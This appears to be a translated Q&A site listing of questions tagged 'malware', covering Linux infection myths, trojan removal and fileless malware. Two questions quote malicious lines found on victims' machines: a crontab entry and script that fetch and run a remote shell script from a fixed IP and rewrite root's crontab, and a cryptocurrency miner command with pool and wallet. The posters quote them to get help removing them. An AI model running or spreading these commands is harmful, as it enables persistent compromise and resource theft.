Questions tagged «malware»

9
关于Unix / Linux中恶意软件的神话
我的Linux机器是否可能被恶意软件感染? 我还没有听说过发生在我认识的任何人身上的情况,而且我已经听说过很多次这是不可能的。真的吗? 如果是这样,Linux Anti-Virus(安全)软件怎么了?
142 security  malware 

2
可疑的crontab条目每15分钟运行一次“ xribfa4”
我想在Raspberry Pi上的根crontab文件中添加一些内容,但发现一个对我来说似乎可疑的条目,在Google上搜索它的部分内容没有任何结果。 Crontab条目: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 的内容http://103.219.112.66:8000/i.sh是: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/root …
59 security  cron  malware 

8
没有管理员或sudo特权的用户运行的恶意软件会损害我的系统吗?[关闭]
最近在运行Linux的计算机上发生故障之后,我在用户的主文件夹中找到了一个密码较弱的可执行文件。我已经清理了似乎所有的损坏,但是为了确保可以完全擦拭干净,我正在准备中。 非sudo或不受特权的用户运行的恶意软件可以做什么?只是在寻找带有世界可写许可标记的文件进行感染吗?非管理员用户可以在大多数Linux系统上执行哪些威胁性操作?您能否提供这种安全漏洞可能导致的现实问题的一些示例?
30 security  malware 

2
如何杀死AWS EC2实例上的地雷恶意软件?(受损的服务器)
我在ec2实例上发现了恶意软件,该实例一直在挖掘比特币并使用实例处理能力。我成功地确定了该过程,但是无法将其删除并杀死它。 我运行了此命令, watch "ps aux | sort -nrk 3,3 | head -n 5" 它显示了实例上运行的前五个进程,从中发现有一个名为“ bashd ” 的进程,它消耗了30%的cpu。这个过程是 bashd -a cryptonight -o stratum+tcp://get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x 我使用kill -9 process_id命令杀死了这个过程。5秒钟后,该过程再次开始。
26 linux  process  kill  malware 


4
如何检测和删除Linux木马?
我最近偶然发现: Linux特洛伊木马将近一年被忽略(虚幻IRCd) 是的,我知道从不受信任的来源添加一些随机的PPA /软件会带来麻烦(或更糟)。我从来没有这样做,但是有很多人这样做(许多Linux博客和小报都鼓励为新奇的应用程序添加PPA,而没有警告它可能会破坏您的系统甚至更糟,从而危及您的安全性。) 如何检测和删除特洛伊木马或流氓应用程序/脚本?
16 security  malware 


2
无文件恶意软件在Linux上如何工作?
我了解无文件恶意软件的定义: 并非基于文件而是仅存在于内存中的恶意代码……更具体地说,无文件恶意代码……将自身附加到内存中的活动进程中…… 有人可以解释一下将其附加到内存中的活动进程如何工作的情况吗? 此外,针对此类攻击可以使用哪些(内核)保护/强化措施?
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.